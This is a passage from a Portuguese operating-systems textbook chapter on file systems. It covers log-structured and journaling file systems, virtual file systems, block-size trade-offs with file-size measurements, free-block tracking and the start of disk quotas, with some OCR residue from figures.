-node, indexado pelo i-número. O registro i nesse mapa 
aponta para o i-node i no disco. O mapa fica armazena- 
do no disco, e também é mantido em cache, de maneira 
que as partes mais intensamente usadas estarão na me- 
mória a maior parte do tempo. 

Para resumir o que dissemos até o momento, todas 
as operações de escrita são inicialmente armazenadas 
na memória, e periodicamente todas as operações de es- 
crita armazenadas são escritas para o disco em um único 
segmento, ao final do diário. Abrir um arquivo agora 
consiste em usar o mapa para localizar o i-node para o 
arquivo. Uma vez que o i-node tenha sido localizado, 
os endereços dos blocos podem ser encontrados a partir 
dele. Todos os blocos em si estarão em segmentos, em 
alguma parte no diário. 


Se discos fossem infinitamente grandes, a descrição 
anterior daria conta de toda a história. No entanto, dis- 
cos reais são finitos, então finalmente o diário ocupará o 
disco inteiro, momento em que nenhum segmento novo 
poderá ser escrito para o diário. Felizmente, muitos seg- 
mentos existentes podem ter blocos que não são mais 
necessários. Por exemplo, se um arquivo for sobrescri- 
to, seu i-node apontará então para os blocos novos, mas 
os antigos ainda estarão ocupando espaço em segmen- 
tos escritos anteriormente. 

Para lidar com esse problema, o LFS tem um thread 
limpador que passa o seu tempo escaneando o diário 
circularmente para compactá-lo. Ele começa lendo o 
resumo do primeiro segmento no diário para ver quais 
i-nodes e arquivos estão ali. Então confere o mapa do 
i-node atual para ver se os i-nodes ainda são atuais e 
se os blocos de arquivos ainda estão sendo usados. Em 
caso negativo, essa informação é descartada. Os i-no- 
des e blocos que ainda estão sendo usados vão para a 
memória para serem escritos no próximo segmento. O 
segmento original é então marcado como disponível, de 
maneira que o arquivo pode usá-lo para novos dados. 
Dessa maneira, o limpador se movimenta ao longo do 
diário, removendo velhos segmentos do final e colocan- 
do quaisquer dados ativos na memória para serem rees- 
critos no segmento seguinte. Em consequência, o disco 
é um grande buffer circular, com o thread de escrita adi- 
cionando novos segmentos ao início e o thread limpador 
removendo os antigos do final. 

Aqui o sistema de registro não é trivial, visto que, 
quando um bloco de arquivo é escrito de volta para um 
novo segmento, o i-node do arquivo (em alguma parte 
no diário) deve ser localizado, atualizado e colocado na 
memória para ser escrito no segmento seguinte. O mapa 
do i-node deve então ser atualizado para apontar para 
a cópia nova. Mesmo assim, é possível fazer a admi- 
nistração, e os resultados do desempenho mostram que 
toda essa complexidade vale a pena. As medidas apre- 
sentadas nos estudos citados mostram que o LFS supera 
o UNIX em desempenho por uma ordem de magnitude 
em escritas pequenas, enquanto tem um desempenho 
que é tão bom quanto, ou melhor que o UNIX para lei- 
turas e escritas grandes. 


4.3.6 Sistemas de arquivos journaling 


Embora os sistemas de arquivos estruturados em 
diário sejam uma ideia interessante, eles não são tão 
usados, em parte por serem altamente incompatíveis 
com os sistemas de arquivos existentes. Mesmo assim, 
uma das ideias inerentes a eles, a robustez diante de 


falhas, pode ser facilmente aplicada a sistemas de ar- 
quivos mais convencionais. A ideia básica aqui é man- 
ter um diário do que o sistema de arquivos vai fazer 
antes que ele o faça; então, se o sistema falhar antes 
que ele possa fazer seu trabalho planejado, ao ser rei- 
nicializado, ele pode procurar no diário para ver o que 
acontecia no momento da falha e concluir o trabalho. 
Esse tipo de sistema de arquivos, chamado de sistemas 
de arquivos journaling, já está em uso na realidade. 
O sistema de arquivos NTFS da Microsoft e os siste- 
mas de arquivos Linux ext3 e ReiserFS todos usam 
journaling. O OS X oferece sistemas de arquivos jour- 
naling como uma opção. A seguir faremos uma breve 
introdução a esse tópico. 

Para ver a natureza do problema, considere uma ope- 
ração corriqueira simples que acontece todo o tempo: 
remover um arquivo. Essa operação (no UNIX) exige 
três passos: 


1. Remover o arquivo do seu diretório. 

2. Liberar o i-node para o conjunto de i-nodes livres. 

3. Retornar todos os blocos de disco para o conjunto 
de blocos de disco livres. 


No Windows, são exigidos passos análogos. Na 
ausência de falhas do sistema, a ordem na qual esses 
passos são dados não importa; na presença de falhas, 
ela importa. Suponha que o primeiro passo tenha sido 
concluído e então haja uma falha no sistema. O i-node 
e os blocos de arquivos não serão acessíveis a partir de 
arquivo algum, mas também não serão acessíveis para 
realocação; eles apenas estarão em algum limbo, dimi- 
nuindo os recursos disponíveis. Se a falha ocorrer após 
o segundo passo, apenas os blocos serão perdidos. 

Se a ordem das operações for mudada e o i-node for 
liberado primeiro, então após a reinicialização, o i-node 
poderá ser realocado, mas a antiga entrada de diretório 
continuará apontando para ele, portanto para o arqui- 
vo errado. Se os blocos forem liberados primeiro, então 
uma falha antes de o i-node ser removido significará 
que uma entrada de diretório válida aponta para um i- 
-node listando blocos que pertencem agora ao conjun- 
to de armazenamento livre e que provavelmente serão 
reutilizados em breve, levando dois ou mais arquivos a 
compartilhar ao acaso os mesmos blocos. Nenhum des- 
ses resultados é bom. 

O que o sistema de arquivos journaling faz é primei- 
ro escrever uma entrada no diário listando as três ações 
a serem concluídas. A entrada no diário é então escrita 
para o disco (e de maneira previdente, quem sabe lendo 
de novo do disco para verificar que ela foi, de fato, es- 
crita corretamente). Apenas após a entrada no diário ter 
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sido escrita é que começam as várias operações. Após 
as operações terem sido concluídas de maneira bem- 
-sucedida, a entrada no diário é apagada. Se o sistema 
falhar agora, ao se recuperar, o sistema de arquivos po- 
derá conferir o diário para ver se havia alguma operação 
pendente. Se afirmativo, todas elas podem ser reexecu- 
tadas (múltiplas vezes no caso de falhas repetidas) até 
que o arquivo seja corretamente removido. 

Para que o journaling funcione, as operações regis- 
tradas no diário devem ser idempotentes, isto é, elas 
podem ser repetidas quantas vezes forem necessárias 
sem prejuízo algum. Operações como “Atualize o mapa 
de bits para marcar i-node k ou bloco n como livres” po- 
dem ser repetidas sem nenhum problema até o objetivo 
ser consumado. Do mesmo modo, buscar um diretório 
e remover qualquer entrada chamada foobar também é 
uma operação idempotente. Por outro lado, adicionar os 
blocos recentemente liberados do i-node K para o final 
da lista livre não é uma operação idempotente, pois eles 
talvez já estejam ali. A operação mais cara “Pesquise 
a lista de blocos livres e inclua o bloco n se ele ain- 
da não estiver lá” é idempotente. Sistemas de arquivos 
journaling têm de arranjar suas estruturas de dados e 
operações ligadas ao diário de maneira que todos sejam 
idempotentes. Nessas condições, a recuperação de fa- 
lhas pode ser rápida e segura. 

Para aumentar a confiabilidade, um sistema de ar- 
quivos pode introduzir o conceito do banco de dados 
de uma transação atômica. Quando esse conceito é 
usado, um grupo de ações pode ser formado pelas ope- 
rações begin transaction e end transaction. O sistema 
de arquivos sabe então que ele precisa completar todas 
as operações do grupo ou nenhuma delas, mas não qual- 
quer outra combinação. 

O NTFS possui um amplo sistema de journaling e 
sua estrutura raramente é corrompida por falhas no sis- 
tema. Ela está em desenvolvimento desde seu primeiro 
lançamento com o Windows NT em 1993. O primeiro 
sistema de arquivos Linux a fazer journaling foi o Rei- 
serFS, mas sua popularidade foi impedida porque ele 
era incompatível com o então sistema de arquivos ext2 
padrão. Em comparação, o ext3, que é um projeto me- 
nos ambicioso do que o ReiserFS, também faz journa- 
ling enquanto mantém a compatibilidade com o sistema 
ext2 anterior. 


4.3.7 Sistemas de arquivos virtuais 


Muitos sistemas de arquivos diferentes estão em uso 
— muitas vezes no mesmo computador — mesmo para 
o mesmo sistema operacional. Um sistema Windows 
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pode ter um sistema de arquivos NTFS principal, mas 
também uma antiga unidade ou partição FAT-16 ou 
FAT-32, que contenha dados antigos, porém ainda ne- 
cessários, e de tempos em tempos um flash drive, um 
antigo CD-ROM ou um DVD (cada um com seu siste- 
ma de arquivos único) podem ser necessários também. 
O Windows lida com esses sistemas de arquivos dís- 
pares identificando cada um com uma letra de unidade 
diferente, como em C:, D: etc. Quando um processo 
abre um arquivo, a letra da unidade está implícita ou ex- 
plicitamente presente, então o Windows sabe para qual 
sistema de arquivos passar a solicitação. Não há uma 
tentativa de integrar sistemas de arquivos heterogêneos 
em um todo unificado. 

Em comparação, todos os sistemas UNIX fazem 
uma tentativa muito séria de integrar múltiplos siste- 
mas de arquivos em uma única estrutura. Um siste- 
ma Linux pode ter o ext2 como o diretório-raiz, com 
a partição ext3 montada em /usr e um segundo disco 
rígido com o sistema de arquivos ReiserFS montado 
em /home, assim como um CD-ROM ISO 9660 tem- 
porariamente montado em /mnt. Do ponto de vista do 
usuário, existe uma hierarquia de sistema de arquivos 
única. O fato de ela lidar com múltiplos sistemas de 
arquivos (incompatíveis) não é visível para os usuários 
ou processos. 

No entanto, a presença de múltiplos sistemas de 
arquivos é definitivamente visível à implementação, e 
desde o trabalho pioneiro da Sun Microsystems (KLEI- 
MAN, 1986), a maioria dos sistemas UNIX usou o con- 
ceito de um VFS (Virtual File System — sistema de 
arquivos virtuais) para tentar integrar múltiplos siste- 
mas de arquivos em uma estrutura ordeira. A ideia fun- 
damental é abstrair a parte do sistema de arquivos que é 
comum a todos os sistemas de arquivos e colocar aquele 
código em uma camada separada que chama os sistemas 
de arquivos subjacentes para realmente gerenciar os da- 
dos. A estrutura como um todo está ilustrada na Figura 


Beles WB ED Posição do sistema de arquivos virtual. 


4.18. A discussão a seguir não é específica ao Linux, 
FreeBSD ou qualquer outra versão do UNIX, mas dá 
uma ideia geral de como os sistemas de arquivos virtu- 
ais funcionam nos sistemas UNIX. 

Todas as chamadas de sistemas relativas a arquivos 
são direcionadas ao sistema de arquivos virtual para 
processamento inicial. Essas chamadas, vindas de ou- 
tros processos de usuários, são as chamadas POSIX 
padrão, como open, read, write, Iseek e assim por 
diante. Desse modo, o VFS tem uma interface “supe- 
rior” para os processos do usuário, e é a já conhecida 
interface POSIX. 

O VFS também tem uma interface “inferior” para os 
sistemas de arquivos reais, que são rotulados de inter- 
face do VFS na Figura 4.18. Essa interface consiste em 
várias dúzias de chamadas de funções que os VFS po- 
dem fazer para cada sistema de arquivos para realizar o 
trabalho. Assim, para criar um novo sistema de arquivos 
que funcione com o VFS, os projetistas do novo sistema 
de arquivos devem certificar-se de que ele proporcione 
as chamadas de funções que o VFS exige. Um exemplo 
óbvio desse tipo de função é aquela que lê um bloco 
específico do disco, coloca-o na cache de buffer do sis- 
tema de arquivos e retorna um ponteiro para ele. Desse 
modo, o VFS tem duas interfaces distintas: a superior 
para os processos do usuário e a inferior para os siste- 
mas de arquivos reais. 

Embora a maioria dos sistemas de arquivos sob o 
VFS represente partições em um disco local, este nem 
sempre é o caso. Na realidade, a motivação original 
para a Sun produzir o VFS era dar suporte a sistemas de 
arquivos remotos usando o protocolo NFS (Network 
File System — sistema de arquivos de rede). O projeto 
VFS foi feito de tal forma que enquanto o sistema de 
arquivos real fornecer as funções que o VFS exigir, o 
VFS não sabe ou se preocupa onde estão armazenados 
os dados ou como é o sistema de arquivos subjacente. 
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Internamente, a maioria das implementações de VFS 
é na essência orientada para objetos, mesmo que todos 
sejam escritos em C em vez de C++. Há vários tipos 
de objetos fundamentais que são em geral aceitos. Esses 
incluem o superbloco (que descreve um sistema de ar- 
quivos), o v-node (que descreve um arquivo) e o diretó- 
rio (que descreve um diretório de sistemas de arquivos). 
Cada um desses tem operações associadas (métodos) 
a que os sistemas de arquivos reais têm de dar supor- 
te. Além disso, o VFS tem algumas estruturas internas 
de dados para seu próprio uso, incluindo a tabela de 
montagem e um conjunto de descritores de arquivos 
para monitorar todos os arquivos abertos nos processos 
do usuário. 

Para compreender como o VFS funciona, vamos re- 
passar um exemplo cronologicamente. Quando o siste- 
ma é inicializado, o sistema de arquivos raiz é registrado 
com o VFS. Além disso, quando outros sistemas de ar- 
quivos são montados, seja no momento da inicialização 
ou durante a operação, também devem registrar-se com 
o VFS. Quando um sistema de arquivos se registra, o 
que ele basicamente faz é fornecer uma lista de endere- 
ços das funções que o VFS exige, seja como um longo 
vetor de chamada (tabela) ou como vários deles, um por 
objeto de VFS, como demanda o VFS. Então, assim que 
um sistema de arquivos tenha se registrado com o VFS, 
este sabe como, digamos, ler um bloco a partir dele — 
ele simplesmente chama a quarta (ou qualquer que seja) 
função no vetor fornecido pelo sistema de arquivos. De 
modo similar, o VFS então também sabe como realizar 
todas as funções que o sistema de arquivos real deve 
fornecer: ele apenas chama a função cujo endereço foi 
fornecido quando o sistema de arquivos registrou. 

Após um sistema de arquivos ter sido montado, ele 
pode ser usado. Por exemplo, se um sistema de arquivos 
foi montado em /usr e um processo fizer a chamada 


open(“/usr/include/unistd.h”, O RDONLY) 


durante a análise do caminho, o VFS vê que um novo 
sistema de arquivos foi montado em /usr e localiza seu 
superbloco pesquisando a lista de superblocos de siste- 
mas de arquivos montados. Tendo feito isso, ele pode 
encontrar o diretório-raiz do sistema de arquivos mon- 
tado e examinar o caminho include/unistd.h ali. O VFS 
então cria um v-node e faz uma chamada para o sistema 
de arquivos real para retornar todas as informações no 
i-node do arquivo. Essa informação é copiada para o 
v-node (em RAM), junto com outras informações, e, o 
mais importante, cria o ponteiro para a tabela de fun- 
ções para chamar operações em v-nodes, como read, 
write, close e assim por diante. 
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Após o v-node ter sido criado, o VFS registra uma 
entrada na tabela de descritores de arquivo para o pro- 
cesso que fez a chamada e faz que ele aponte para o 
novo v-node. (Para os puristas, o descritor de arquivos 
na realidade aponta para outras estruturas de dados que 
contêm a posição atual do arquivo e um ponteiro para o 
v-node, mas esse detalhe não é importante para nossas 
finalidades aqui.) Por fim, o VFS retorna o descritor de 
arquivos para o processo que chamou, assim ele pode 
usá-lo para ler, escrever e fechar o arquivo. 

Mais tarde, quando o processo realiza um read usan- 
do o descritor de arquivos, o VFS localiza o v-node do 
processo e das tabelas de descritores de arquivos e se- 
gue o ponteiro até a tabela de funções, na qual estão 
os endereços dentro do sistema de arquivos real, no 
qual reside o arquivo solicitado. A função responsável 
pelo read é chamada agora e o código dentro do sis- 
tema de arquivos real vai e busca o bloco solicitado. 
O VFS não faz ideia se os dados estão vindo do disco 
local, um sistema de arquivos remoto através da rede, 
um pen-drive ou algo diferente. As estruturas de dados 
envolvidas são mostradas na Figura 4.19. Começando 
com o número do processo chamador e o descritor do 
arquivo, então o v-node, o ponteiro da função de leitura 
e a função de acesso dentro do sistema de arquivos real 
são localizados. 

Dessa maneira, adicionar novos sistemas de arqui- 
vos torna-se algo relativamente direto. Para realizar a 
operação, os projetistas primeiro tomam uma lista de 
chamadas de funções esperadas pelo VFS e então es- 
crevem seu sistema de arquivos para prover todas elas. 
Como alternativa, se o sistema de arquivos já existe, en- 
tão eles têm de prover funções adaptadoras que façam 
o que o VFS precisa, normalmente realizando uma ou 
mais chamadas nativas ao sistema de arquivos real. 


4.4 Gerenciamento e otimização 
de sistemas de arquivos 


Fazer o sistema de arquivos funcionar é uma coisa: 
fazê-lo funcionar de forma eficiente e robustamente na 
vida real é algo bastante diferente. Nas seções a seguir 
examinaremos algumas das questões envolvidas no ge- 
renciamento de discos. 


4.4.1 Gerenciamento de espaço em disco 


Arquivos costumam ser armazenados em disco, por- 
tanto o gerenciamento de espaço de disco é uma preo- 
cupação importante para os projetistas de sistemas de 
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le E S Uma visão simplificada das estruturas de dados e código usados pelo VFS e pelo sistema de arquivos real para realizar 


uma operação read. 
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arquivos. Duas estratégias gerais são possíveis para 
armazenar um arquivo de n bytes: ou são alocados n 
bytes consecutivos de espaço, ou o arquivo é dividido 
em uma série de blocos (não necessariamente) conti- 
guos. A mesma escolha está presente em sistemas de 
gerenciamento de memória entre a segmentação pura e 
a paginação. 

Como vimos, armazenar um arquivo como uma se- 
quência contígua de bytes tem o problema óbvio de que 
se um arquivo crescer, ele talvez tenha de ser movido 
dentro do disco. O mesmo problema ocorre para seg- 
mentos na memória, exceto que mover um segmento 
na memória é uma operação relativamente rápida em 
comparação com mover um arquivo de uma posição no 
disco para outra. Por essa razão, quase todos os sistemas 
de arquivos os dividem em blocos de tamanho fixo que 
não precisam ser adjacentes. 


Tamanho do bloco 


Uma vez que tenha sido feita a opção de armaze- 
nar arquivos em blocos de tamanho fixo, a questão 
que surge é qual tamanho o bloco deve ter. Dado o 
modo como os discos são organizados, o setor, a trilha 
e o cilindro são candidatos óbvios para a unidade de 


< para o sistema de 
arquivos 1 


FS 1 





alocação (embora sejam todos dependentes do dispo- 
sitivo, o que é um ponto negativo). Em um sistema de 
paginação, o tamanho da página também é um argu- 
mento importante. 

Ter um tamanho de bloco grande significa que todos 
os arquivos, mesmo um de 1 byte, ocuparão um cilindro 
inteiro. Também significa que arquivos pequenos des- 
perdiçam uma grande quantidade de espaço de disco. Por 
outro lado, um tamanho de bloco pequeno significa que 
a maioria dos arquivos ocupará múltiplos blocos e, desse 
modo, precisará de múltiplas buscas e atrasos rotacionais 
para lê-los, reduzindo o desempenho. Então, se a unida- 
de de alocação for grande demais, desperdiçamos espa- 
ço; se ela for pequena demais, desperdiçamos tempo. 

Fazer uma boa escolha exige ter algumas infor- 
mações sobre a distribuição do tamanho do arquivo. 
Tanenbaum et al. (2006) estudaram a distribuição do 
tamanho do arquivo no Departamento de Ciências 
de Computação de uma grande universidade de pes- 
quisa (a Universidade Vrije) em 1984 e então nova- 
mente em 2005, assim como em um servidor da web 
comercial hospedando um site de política (<www. 
electoral-vote.com>). Os resultados são mostrados 
na Figura 4.20, na qual é listada, para cada grupo, a 
porcentagem de todos os arquivos menores ou iguais 
ao tamanho (representado por potência de base dois). 
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[cj] Porcentagem de arquivos menores do que um determinado tamanho (em bytes). 






























































Tamanho | UV 1984 | UV 2005 | Web Tamanho | UV 1984 | UV 2005 Web 
1 1,79 1,38 6,67 16 KB 92,53 78,92 86,79 
2 1,88 1,53 7,67 32 KB 97,21 85,87 91,65 
4 2,01 1,65 8,33 64 KB 99,18 90,84 94,80 
8 2,31 1,80 | 11,30 128 KB 99,84 93,73 96,93 
16 3,32 2,15 | 11,46 256 KB 99,96 96,12 98,48 
32 5,13 3,15 | 12,33 512 KB 100,00 97,73 98,99 
64 8,71 4,98 | 26,10 1 MB 100,00 98,87 99,62 
128 14,73 8,03 | 28,49 2 MB 100,00 99,44 99,80 
256 23,09 13,29 | 32,10 4MB 100,00 99,71 99,87 
512 34,44 20,62 | 39,94 8 MB 100,00 99,86 99,94 
1 KB 48,05 30,91 | 47,82 16 MB 100,00 99,94 99,97 
2 KB 60,87 46,09 | 59,44 32 MB 100,00 99,97 99,99 
4 KB 75,31 59,13 | 70,64 64 MB 100,00 99,99 99,99 
8 KB 84,97 69,96 | 79,69 128 MB 100,00 99,99 | 100,00 




















Por exemplo, em 2005, 59,13% de todos os arquivos 
na Universidade de Vrije tinham 4 KB ou menos e 
90,84% de todos eles, 64 KB ou menos. O tamanho 
de arquivo médio era de 2.475 bytes. Algumas pesso- 
as podem achar esse tamanho pequeno surpreendente. 

Que conclusões podemos tirar desses dados? Por um 
lado, com um tamanho de bloco de 1 KB, apenas em tor- 
no de 30-50% de todos os arquivos cabem em um único 
bloco, enquanto com um bloco de 4 KB, a percentagem 
de arquivos que cabem em um bloco sobe para a faixa 
de 60-70%. Outros dados no estudo mostram que com 
um bloco de 4 KB, 93% dos blocos do disco são usa- 
dos por 10% dos maiores arquivos. Isso significa que o 
desperdício de espaço ao fim de cada pequeno arquivo é 
insignificante, pois o disco está cheio por uma pequena 
quantidade de arquivos grandes (vídeos) e o montante 
total de espaço tomado pelos arquivos pequenos pouco 
importa. Mesmo dobrando o espaço requerido por 90% 
dos menores arquivos, isso mal seria notado. 

Por outro lado, utilizar um pequeno bloco signifi- 
ca que cada arquivo consistirá em muitos blocos. Ler 
cada bloco exige uma busca e um atraso rotacional 
(exceto em um disco em estado sólido), então a leitura 
de um arquivo consistindo em muitos blocos pequenos 
será lenta. 

Como exemplo, considere um disco com 1 MB por 
trilha, um tempo de rotação de 8,33 ms e um tempo de 


busca de 5 ms. O tempo em milissegundos para ler um 
bloco de k bytes é então a soma dos tempos de busca, 
atraso rotacional e transferência: 


5 + 4,165 + (k/1000000) x 8,33 


A curva tracejada da Figura 4.21 mostra a taxa de 
dados para um disco desses como uma função do ta- 
manho do bloco. Para calcular a eficiência de espaço, 
precisamos fazer uma suposição a respeito do tamanho 
médio do arquivo. Para simplificar, vamos presumir 
que todos os arquivos tenham 4 KB. Embora esse nú- 
mero seja ligeiramente maior do que os dados medidos 
na Universidade de Vrije, os estudantes provavelmente 
têm mais arquivos pequenos do que os existentes em 
um centro de dados corporativo, então, como um todo, 
talvez seja um palpite melhor. A curva sólida da Figura 
4.21 mostra a eficiência de espaço como uma função do 
tamanho do bloco. 

As duas curvas podem ser compreendidas como a se- 
guir. O tempo de acesso para um bloco é completamente 
dominado pelo tempo de busca e atraso rotacional, en- 
tão levando-se em consideração que serão necessários 
9 ms para acessar um bloco, quanto mais dados forem 
buscados, melhor. Assim, a taxa de dados cresce quase 
linearmente com o tamanho do bloco (até as transfe- 
rências demorarem tanto que o tempo de transferência 
começa a importar). 
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glei]: EPAF A curva tracejada (escala da esquerda) mostra a taxa de dados de um disco. A curva contínua (escala da direita) mostra a 
eficiência do espaço em disco. Todos os arquivos têm 4 KB. 
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Agora considere a eficiência de espaço. Com arquivos 
de 4 KB e blocos de 1 KB, 2 KB ou 4 KB, os arquivos 
usam 4, 2 e 1 bloco, respectivamente, sem desperdício. 
Com um bloco de 8 KB e arquivos de 4 KB, a eficiência de 
espaço cai para 50% e com um bloco de 16 KB ela chega a 
25%. Na realidade, poucos arquivos são um múltiplo exato 
do tamanho do bloco do disco, então algum espaço sempre 
é desperdiçado no último bloco de um arquivo. 

O que as curvas mostram, no entanto, é que o desem- 
penho e a utilização de espaço estão inerentemente em 
conflito. Pequenos blocos são ruins para o desempenho, 
mas bons para a utilização do espaço do disco. Para es- 
ses dados, não há equilíbrio que seja razoável. O tama- 
nho mais próximo de onde as duas curvas se cruzam é 
64 KB, mas a taxa de dados é de apenas 6,6 MB/s e a 
eficiência de espaço é de cerca de 7%, nenhum dos dois 
valores é muito bom. Historicamente, sistemas de ar- 
quivos escolheram tamanhos na faixa de 1 KB a 4 KB, 
mas com discos agora excedendo 1 TB, pode ser melhor 
aumentar o tamanho do bloco para 64 KB e aceitar o 
espaço de disco desperdiçado. Hoje é muito pouco pro- 
vável que falte espaço de disco. 

Em um experimento para ver se o uso de arquivos do 
Windows NT era apreciavelmente diferente do uso de 
arquivos do UNIX, Vogels tomou medidas nos arquivos 
na Universidade de Cornell (VOGELS, 1999). Ele ob- 
servou que o uso de arquivos no NT é mais complicado 
que no UNIX. Ele escreveu: 


Quando digitamos alguns caracteres no editor de 
texto do Notepad, o salvamento dessa digitação em 
um arquivo desencadeará 26 chamadas de sistema, 
incluindo 3 tentativas de abertura que falharam, 1 
arquivo sobrescrito e 4 sequências adicionais de 
abertura e fechamento. 


Não obstante isso, Vogels observou um tamanho mé- 
dio (ponderado pelo uso) de arquivos apenas lidos como 


0% 


64KB 256KB 1MB 


1 KB, arquivos apenas escritos como 2,3 KB e arquivos 
lidos e escritos como 4,2 KB. Considerando as diferen- 
tes técnicas de mensuração de conjuntos de dados, e o 
ano, esses resultados são certamente compativeis com 
os da Universidade de Vrije. 


Monitoramento dos blocos livres 


Uma vez que um tamanho de bloco tenha sido es- 
colhido, a próxima questão é como monitorar os blo- 
cos livres. Dois métodos são amplamente usados, como 
mostrado na Figura 4.22. O primeiro consiste em usar 
uma lista encadeada de blocos de disco, com cada blo- 
co contendo tantos números de blocos livres de disco 
quantos couberem nele. Com um bloco de 1 KB e um 
número de bloco de disco de 32 bits, cada bloco na lista 
livre contém os números de 255 blocos livres. (Uma en- 
trada é reservada para o ponteiro para o bloco seguinte.) 
Considere um disco de 1 TB, que tem em torno de 1 
bilhão de blocos de disco. Armazenar todos esses en- 
dereços em blocos de 255 exige cerca de 4 milhões de 
blocos. Em geral, blocos livres são usados para conter a 
lista livre, de maneira que o armazenamento seja essen- 
cialmente gratuito. 

A outra técnica de gerenciamento de espaço livre é 
o mapa de bits. Um disco com n blocos exige um mapa 
de bits com n bits. Blocos livres são representados por 
Is no mapa, blocos alocados por Os (ou vice-versa). 
Para nosso disco de 1 TB de exemplo, precisamos de 
1 bilhão de bits para o mapa, o que exige em torno 
de 130.000 blocos de 1 KB para armazenar. Não sur- 
preende que o mapa de bits exija menos espaço, tendo 
em vista que ele usa 1 bit por bloco, versus 32 bits no 
modelo de lista encadeada. Apenas se o disco estiver 
praticamente cheio (isto é, tiver poucos blocos livres) 
o esquema da lista encadeada exigirá menos blocos do 
que o mapa de bits. 
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(FIGURA 4.22 | (a) Armazenamento da lista de blocos livres em uma lista encadeada. (b) Um mapa de bits. 


Blocos livres de disco: 16, 17, 18 





Um bloco de disco de 1 KB pode conter 256 números 


de blocos de disco de 32 bits 


(a) 


Se os blocos livres tenderem a vir em longos conjun- 
tos de blocos consecutivos, o sistema da lista de blocos 
livres pode ser modificado para controlar conjuntos de 
blocos em vez de blocos individuais. Um contador de 8, 
16 ou 32 bits poderia ser associado com cada bloco dan- 
do o número de blocos livres consecutivos. No melhor 
caso, um disco basicamente vazio seria representado 
por dois números: o endereço do primeiro bloco livre 
seguido pelo contador de blocos livres. Por outro lado, 
se o disco se tornar severamente fragmentado, o contro- 
le de conjuntos de blocos será menos eficiente do que o 
controle de blocos individuais, pois não apenas o ende- 
reço deverá ser armazenado, mas também o contador. 

Essa questão ilustra um problema que os projetis- 
tas de sistemas operacionais muitas vezes enfrentam. 
Existem múltiplas estruturas de dados e algoritmos que 
podem ser usados para solucionar um problema, mas a 
escolha do melhor exige dados que os projetistas não 
têm e não terão até que o sistema seja distribuído e am- 
plamente utilizado. E, mesmo assim, os dados podem 
não estar disponíveis. Por exemplo, nossas próprias me- 
didas de tamanhos de arquivos na Universidade de Vrije 
em 1984 e 1995, os dados do site e os dados de Cornell 
são apenas quatro amostras. Embora muito melhor do 
que nada, temos pouca certeza se eles são também re- 
presentativos de computadores pessoais, computadores 
corporativos, computadores do governo e outros. Com 
algum esforço poderíamos ser capazes de conseguir al- 
gumas amostras de outros tipos de computadores, mas 


1001101101101100 


1101111101110111 


Um mapa de bits 


(b) 


mesmo assim seria uma bobagem extrapolar para todos 
os computadores dos tipos mensurados. 

Voltando para o método da lista de blocos livres por 
um momento, apenas um bloco de ponteiros precisa 
ser mantido na memória principal. Quando um arquivo 
é criado, os blocos necessários são tomados do bloco 
de ponteiros. Quando ele se esgota, um novo bloco de 
ponteiros é lido do disco. De modo similar, quando um 
arquivo é removido, seus blocos são liberados e adi- 
cionados ao bloco de ponteiros na memória principal. 
Quando esse bloco completa, ele é escrito no disco. 

Em determinadas circunstâncias, esse método leva a 
operações desnecessárias de E/S em disco. Considere a 
situação da Figura 4.23(a), na qual o bloco de ponteiros 
na memória tem espaço para somente duas entradas. Se 
um arquivo de três blocos for liberado, o bloco de pon- 
teiros transbordará e ele deverá ser escrito para o disco, 
levando à situação da Figura 4.23(b). Se um arquivo de 
três blocos for escrito agora, o bloco de ponteiros cheio 
deverá ser lido novamente, trazendo-nos de volta para 
a Figura 4.23(a). Se o arquivo de três blocos recém- 
-escrito constituir um arquivo temporário, quando ele 
for liberado, será necessária outra operação de escrita 
para escrever novamente o bloco de ponteiros cheio no 
disco. Resumindo, quando o bloco de ponteiros estiver 
quase vazio, uma série de arquivos temporários de vida 
curta pode causar muitas operações de E/S em disco. 

Uma abordagem alternativa que evita a maior par- 
te dessas operações de E/S em disco é dividir o bloco 
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[FIGURA 4.23 | (a) Um bloco na memória quase cheio de ponteiros para blocos de disco livres e três blocos de ponteiros em disco. (b) 
Resultado da liberação de um arquivo de três blocos. (c) Uma estratégia alternativa para lidar com os três blocos livres. As 
entradas sombreadas representam ponteiros para blocos de discos livres. 


Disco 
Memória ; 
principal y 


| 
(a) (b) (c) 


cheio de ponteiros. Desse modo, em vez de ir da Figura 
4.23(a) para a Figura 4.23(b), vamos da Figura 4.23(a) 
para a Figura 4.23(c) quando três blocos são liberados. 
Agora o sistema pode lidar com uma série de arquivos 
temporários sem realizar qualquer operação de E/S em 
disco. Se o bloco na memória encher, ele será escrito 
para o disco e o bloco meio cheio será lido do disco. A 
ideia aqui é manter a maior parte dos blocos de pontei- 
ros cheios em disco (para minimizar o uso deste), mas 
manter o bloco na memória cheio pela metade, de ma- 
neira que ele possa lidar tanto com a criação quanto com 
a remoção de arquivos, sem uma operação de E/S em 
disco para a lista de livres. 

Com um mapa de bits, também é possível manter 
apenas um bloco na memória, usando o disco para outro 
bloco apenas quando ele ficar completamente cheio ou 
vazio. Um benefício adicional dessa abordagem é que 
ao realizar toda a alocação de um único bloco do mapa 
de bits, os blocos de disco estarão mais próximos, mi- 
nimizando assim os movimentos do braço do disco. Já 
que o mapa de bits é uma estrutura de dados de tama- 
nho fixo, se o núcleo estiver (parcialmente) paginado, o 
mapa de bits pode ser colocado na memória virtual e ter 
suas páginas paginadas conforme a necessidade. 


Cotas de disco 


Para evitar que as pessoas exagerem no uso do espa- 
ço de disco, sistemas operacionais de múltiplos usuários 
muitas vezes fornecem um mecanismo para impor co- 
tas de disco. A ideia é que o administrador do sistema 
designe a cada usuário uma cota máxima de arquivos e 
blocos, e o sistema operacional se certifique de que os 
usuários não excedam essa cota. Um mecanismo típico 
é descrito a seguir. 

Quando um usuário abre um arquivo, os atributos e 
endereços de disco são localizados e colocados em uma 


tabela de arquivos aberta na memória principal. Entre 
os atributos há uma entrada dizendo quem é o proprie- 
tário. Quaisquer aumentos no tamanho do arquivo serão 
cobrados da cota do proprietário. 

Uma segunda tabela contém os registros de cotas de 
todos os usuários com um arquivo aberto, mesmo que esse 
arquivo tenha sido aberto por outra pessoa. Essa tabela está 
mostrada na Figura 4.24. Ela foi extraída de um arquivo de 
cotas no disco para os usuários cujos arquivos estão atual- 
mente abertos. Quando todos os arquivos são fechados, o 
registro é escrito de volta para o arquivo de cotas. 

Quando uma nova entrada é feita na tabela de arqui- 
vos abertos, um ponteiro para o registro de cota do pro- 
prietário é atribuído a ela, a fim de facilitar encontrar os 
vários limites. Toda vez que um bloco é adicionado a um 
arquivo, o número total de blocos cobrados do proprie- 
tário é incrementado, e os limites flexíveis e estritos são 
